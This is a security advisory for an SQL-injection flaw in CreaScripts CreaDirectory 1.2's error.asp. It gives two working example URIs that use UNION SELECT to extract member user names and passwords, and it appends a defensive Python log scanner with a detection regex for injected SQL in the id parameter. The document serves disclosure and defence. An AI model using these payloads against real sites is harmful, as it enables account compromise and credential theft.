Creascripts CreaDirectory Error.ASP SQL Injection Vulnerability
BID:23564
Info
| Bugtraq ID: | 23564 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Apr 19 2007 12:00AM |
| Updated: | Apr 19 2007 10:51PM |
| Credit: | CyberGhost is credited with the discovery of this vulnerability. |
| Vulnerable: | CreaScripts creadirectory 1.2 |
| Not Vulnerable: | |
Discussion
Creascripts CreaDirectory is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation.
Creascripts CreaDirectory 1.2 is vulnerable; other versions may also be affected.
Exploit / POC
Attackers can use a browser to exploit this issue.
The following example URIs are available:
Username: http://www.example.com/error.asp?id=-1+union+select+0,1,2,user_name,4,5,6,7,8,9,0,1,2,3,4,5+from+members
Password: http://www.example.com/error.asp?id=-1+union+select+0,1,2,ipassword,4,5,6,7,8,9,0,1,2,3,4,5+from+members
Solution / Fix
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: mailto:[email protected].
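With no vendor patch available, web server logs can be reviewed for requests to error.asp whose id parameter is not a plain integer. The following is an added example, not part of the original advisory or the vendor's code; it assumes that id is meant to be numeric and that logs use the W3C field order shown in the comment, and the function names and sample lines are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

# Assumption: error.asp only ever needs a plain integer in `id`.
INT_RE = re.compile(r"-?\d{1,10}")
SQL_RE = re.compile(r"\b(union|select|from)\b|--|;|'", re.I)

# Constructed sample lines; assumed W3C field order:
# date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
SAMPLE_LOG = """\
2007-04-19 10:00:01 192.0.2.10 GET /error.asp id=404 200
2007-04-19 10:00:05 198.51.100.7 GET /error.asp id=-1+union+select+0,1,2,user_name,4,5,6,7,8,9,0,1,2,3,4,5+from+members 200
2007-04-19 10:00:09 198.51.100.7 GET /Error.ASP ID=-1%20UNION%20SELECT%200,1,2,ipassword,4+from+members 200
2007-04-19 10:00:12 192.0.2.11 GET /error.asp id=abc 200
2007-04-19 10:00:15 192.0.2.12 GET /default.asp id=1+union+select 200
"""

def classify_id(query):
    """Return 'ok', 'non-numeric' or 'sqli' for the id parameter(s) of a query string."""
    # parse_qsl decodes '+' and %xx; ASP matches parameter names case-insensitively.
    values = [v for k, v in parse_qsl(query, keep_blank_values=True)
              if k.lower() == "id"]
    verdict = "ok"
    for v in values:
        if SQL_RE.search(v):
            return "sqli"
        if not INT_RE.fullmatch(v.strip()):
            verdict = "non-numeric"
    return verdict

def scan(log_text, page="/error.asp"):
    """Return a list of (client_ip, verdict, raw_query) for suspicious requests to `page`."""
    hits = []
    for line in log_text.splitlines():
        fields = line.split()
        if line.startswith("#") or len(fields) < 7 or fields[4].lower() != page:
            continue
        verdict = classify_id(fields[5])
        if verdict != "ok":
            hits.append((fields[2], verdict, fields[5]))
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(*hit, sep="\t")
```

The same integer-only rule can be enforced in front of the application (for example in a reverse proxy or request filter) so that any non-numeric id is rejected before it reaches the SQL query.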
References
References:
- Creadirectory Web Site (Creascripts)